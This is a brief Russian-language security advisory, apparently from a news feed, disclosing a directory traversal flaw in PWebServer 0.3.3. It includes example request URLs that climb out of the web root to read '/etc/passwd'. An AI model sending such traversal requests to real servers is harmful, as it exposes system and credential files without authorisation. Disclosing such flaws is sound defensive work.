Просмотр произвольных файлов в PWebServer

Программа: PWebServer 0.3.3

Уязвимость обнаружена в PWebServer. Удаленный пользователь может просматривать произвольные файлы на системе.

Пример:

http://[host]:6789/../someFile
http://[host]:6789/../../../../etc/passwd

Анатолий Ализар: Бывший автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.